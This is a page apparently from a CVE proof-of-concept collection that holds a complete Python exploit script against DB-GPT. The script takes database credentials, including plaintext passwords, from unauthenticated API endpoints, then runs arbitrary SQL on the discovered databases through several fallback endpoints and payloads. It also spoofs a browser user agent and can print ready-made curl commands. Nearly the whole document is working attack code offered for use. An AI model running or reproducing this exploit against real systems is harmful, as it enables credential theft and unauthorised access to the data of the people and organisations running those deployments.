5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / dbgpt_poc.py PY
import requests
import json
import urllib3
import argparse
import sys

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def banner():
    print(r"""
    ____  ____  ________  ____  ______   ____  ____  ______
   / __ \/ __ )/ ____/  |/  / |/ /  _/  / __ \/ __ \/ ____/
  / / / / __  / / __/ /|_/ / /|_/ // /   / /_/ / / / / /     
 / /_/ / /_/ / /_/ / /  / / /  / // /   / ____/ /_/ / /___   
/_____/_____/\____/_/  /_/_/  /_/___/  /_/    \____/\____/   
                                                             
    [+] DBGPT Unauthenticated Information Disclosure & SQL Execution PoC
    """)

# DB Type to Version Query Mapping
DB_QUERIES = {
    "mysql": "SELECT VERSION();",
    "postgresql": "SELECT version();",
    "postgres": "SELECT version();",
    "sqlite": "SELECT sqlite_version();",
    "oracle": "SELECT banner FROM v$version WHERE ROWNUM = 1;",
    "mssql": "SELECT @@VERSION;",
    "sqlserver": "SELECT @@VERSION;",
    "dm": "SELECT * FROM v$version;",  # Dameng DB
    "kingbase": "SELECT version();",   # Kingbase
}

def get_smart_sql(db_type, default_sql):
    """
    Select appropriate SQL query based on database type if user didn't specify a custom one.
    """
    if not db_type:
        return default_sql
        
    db_type = db_type.lower()
    
    # If the default SQL is generic (SELECT VERSION()), try to find a specific one
    if "select version()" in default_sql.lower():
        for key, query in DB_QUERIES.items():
            if key in db_type:
                return query
                
    return default_sql

def get_datasources(base_url):
    """
    Attempt to retrieve database credentials from known endpoints.
    """
    endpoints = [
        "/api/v2/serve/datasources",
        "/api/v1/chat/db/list",
        "/api/v1/editor/db/list"  # Sometimes this exists too
    ]
    
    found_dbs = []
    
    for endpoint in endpoints:
        target_url = base_url.rstrip("/") + endpoint
        print(f"[*] Trying to fetch datasources from: {target_url}")
        
        try:
            response = requests.get(target_url, verify=False, timeout=10)
            
            if response.status_code == 200:
                try:
                    data = response.json()
                    
                    # Check if success is true
                    if data.get("success") is True:
                        db_list = data.get("data", [])
                        if db_list:
                            print(f"[+] SUCCESS! Found {len(db_list)} database configurations at {endpoint}")
                            for db in db_list:
                                # Extract key info
                                # Handle different JSON structures
                                if "params" in db:
                                    params = db.get("params", {})
                                    db_info = {
                                        "id": db.get("id"),
                                        "type": db.get("type"),
                                        "name": params.get("database") or db.get("db_name"),
                                        "user": params.get("user"),
                                        "password": params.get("password"),
                                        "host": params.get("host"),
                                        "port": params.get("port"),
                                        "driver": params.get("driver")
                                    }
                                else:
                                    # Structure for /api/v1/chat/db/list (alternative format)
                                    db_info = {
                                        "id": db.get("id"),
                                        "type": db.get("db_type"),
                                        "name": db.get("db_name"),
                                        "user": db.get("db_user"),
                                        "password": db.get("db_pwd"),
                                        "host": db.get("db_host"),
                                        "port": db.get("db_port"),
                                        "driver": db.get("db_type")
                                    }
                                found_dbs.append(db_info)
                            
                            # If we found data, we can stop trying other endpoints or continue to gather more
                            # Let's return what we found from this working endpoint
                            return found_dbs
                        else:
                            print(f"[-] Endpoint {endpoint} returned success but no data.")
                    else:
                         print(f"[-] Endpoint {endpoint} returned success=false.")
                except json.JSONDecodeError:
                    print(f"[-] Endpoint {endpoint} did not return valid JSON.")
            else:
                print(f"[-] Endpoint {endpoint} returned status code: {response.status_code}")
                
        except Exception as e:
            print(f"[!] Error connecting to {target_url}: {e}")
            
    return found_dbs

def run_sql(base_url, db_name, sql_query, generate_curl=False):
    """
    Execute SQL query using various endpoints to bypass potential server-side bugs.
    """
    
    # If generating curl, we just use the first standard endpoint and exit
    if generate_curl:
        target_url = base_url.rstrip("/") + "/api/v1/editor/chart/run"
        payload = {
            "db_name": db_name,
            "chart_type": "bar",
            "sql": sql_query
        }
        # Compact JSON for curl
        json_payload = json.dumps(payload)
        
        # Format for Windows/PowerShell friendliness
        print("\n[+] Generated cURL command:")
        print(f'curl -X POST "{target_url}" -H "Content-Type: application/json" -d \'{json_payload}\'')
        return True

    endpoints = [
        "/api/v1/editor/chart/run",  # Standard endpoint
        "/api/v1/sql/exec",          # Alternative
        "/api/v1/editor/db/run",     # Another possibility
        "/api/v2/serve/query"        # v2 API attempt
    ]
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
    }

    print(f"\n[*] Executing SQL on database '{db_name}': {sql_query}")
    
    # Try different endpoints
    for endpoint in endpoints:
        target_url = base_url.rstrip("/") + endpoint
        # print(f"[*] Trying endpoint: {endpoint}")
        
        # Try different payloads if the first one fails
        payloads = [
            # Standard payload
            {
                "db_name": db_name,
                "chart_type": "bar",
                "sql": sql_query
            },
            # Payload with dummy chart info (sometimes required)
            {
                 "db_name": db_name, 
                 "chart_type": "bar", 
                 "sql": sql_query,
                 "chart_name": "test_chart",
                 "chart_desc": "test_desc"
            },
            # Simplified payload for raw SQL execution endpoints
            {
                "db_name": db_name,
                "sql": sql_query
            }
        ]
        
        for i, payload in enumerate(payloads):
            try:
                # specific handling for different endpoints might be needed, but generic payloads cover most cases
                response = requests.post(target_url, json=payload, headers=headers, verify=False, timeout=15)
                
                if response.status_code == 200:
                    try:
                        data = response.json()
                        if data.get("success") is True:
                            # Handle different response structures
                            sql_data = data.get("data", {})
                            
                            # Sometimes data is directly in 'data', sometimes in 'data.sql_data'
                            if "sql_data" in sql_data:
                                sql_data = sql_data.get("sql_data", {})
                                
                            columns = sql_data.get("colunms", []) or sql_data.get("columns", []) # Handle typo in API response 'colunms'
                            values = sql_data.get("values", [])
                            
                            print(f"[+] SQL Execution Successful! (Endpoint: {endpoint})")
                            if columns:
                                print(f"    Columns: {columns}")
                            if values:
                                print("    Results:")
                                for row in values:
                                    print(f"    {row}")
                            else:
                                print("    (No rows returned)")
                            return True
                        else:
                            err_msg = data.get('err_msg', '')
                            # Only print error if it's the last attempt or a significant error
                            if "unexpected keyword argument 'params'" in err_msg:
                                print(f"[-] Server Error at {endpoint}: Backend code bug (unexpected 'params'). This is common in some DBGPT versions with PostgreSQL.")
                            elif i == len(payloads) - 1:
                                print(f"[-] SQL Execution Failed at {endpoint}. Message: {err_msg}")
                    except json.JSONDecodeError:
                        pass # create noise only if all fail
                elif response.status_code == 404:
                    pass # Endpoint doesn't exist, try next
                else:
                    pass # Other errors, try next
                    
            except Exception as e:
                pass # Network errors, try next

    print("[-] All SQL execution attempts failed.")
    return False

def main():
    banner()
    
    examples = """
    Examples:
        # Basic check for DB info and version
        python dbgpt_poc.py -u https://dbgpt.example.com

        # Execute custom SQL
        python dbgpt_poc.py -u https://dbgpt.example.com --sql "SELECT user();"

        # Specify a database name if auto-detection fails
        python dbgpt_poc.py -u https://dbgpt.example.com --db "target_db" --sql "SHOW TABLES;"
    """
    
    parser = argparse.ArgumentParser(
        description="DBGPT Vulnerability PoC",
        epilog=examples,
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., https://dbgpt.example.com)")
    parser.add_argument("-s", "--sql", default="SELECT VERSION();", help="SQL query to execute (default: SELECT VERSION())")
    parser.add_argument("--db", help="Specific database name to use for SQL execution (optional, otherwise uses discovered DBs)")
    parser.add_argument("--curl", action="store_true", help="Generate cURL command instead of executing SQL")
    
    args = parser.parse_args()
    
    # 1. Get Datasources / Leak Info
    print("--- [ Phase 1: Information Disclosure ] ---")
    dbs = get_datasources(args.url)
    
    valid_db_names = []
    
    if dbs:
        print(f"\n[+] Found {len(dbs)} Database Configurations:")
        for i, db in enumerate(dbs):
            print(f"\n    [{i+1}] Database ID: {db['id']}")
            print(f"        Name     : {db['name']}")
            print(f"        Type     : {db['type']}")
            print(f"        Host     : {db['host']}")
            print(f"        Port     : {db['port']}")
            print(f"        User     : {db['user']}")
            print(f"        Password : {db['password']}") # Leaked credential
            
            if db['name']:
                valid_db_names.append(db['name'])
    else:
        print("[-] No datasources found. Authentication might be required or endpoints patched.")
    
    # 2. SQL Execution
    print("\n--- [ Phase 2: SQL Execution ] ---")
    
    targets = []
    
    # Prioritize user-provided DB
    if args.db:
        print(f"[*] Using manually specified database: {args.db}")
        targets.append({"name": args.db, "type": "unknown"}) # We don't know type if manually specified
    
    # If no manual DB, use discovered ones
    elif dbs:
        print(f"[*] Using discovered databases for SQL execution...")
        targets = dbs # Use all found DBs, not just names, to get their types
    
    if not targets:
        print("[-] No database targets available for SQL execution.")
        print("    Tips: Use --db <name> to manually specify a target if Information Disclosure failed.")
        return

    # Execute SQL on each target
    for target in targets:
        db_name = target['name']
        db_type = target.get('type')
        
        if not db_name:
            # Handle case where name is None/Empty
            print(f"[-] Skipping target with empty name (ID: {target.get('id')})")
            continue
            
        # Determine best SQL query
        # If user provided a specific custom SQL (not default), use it.
        # Otherwise, try to adapt based on DB type.
        sql_to_run = get_smart_sql(db_type, args.sql)

        if not args.curl:
            print(f"\n[+] Target: {db_name} (Type: {db_type})")
            if sql_to_run != args.sql:
                print(f"    -> Adapted SQL for {db_type}: {sql_to_run}")
            
        run_sql(args.url, db_name, sql_to_run, generate_curl=args.curl)

if __name__ == "__main__":
    main()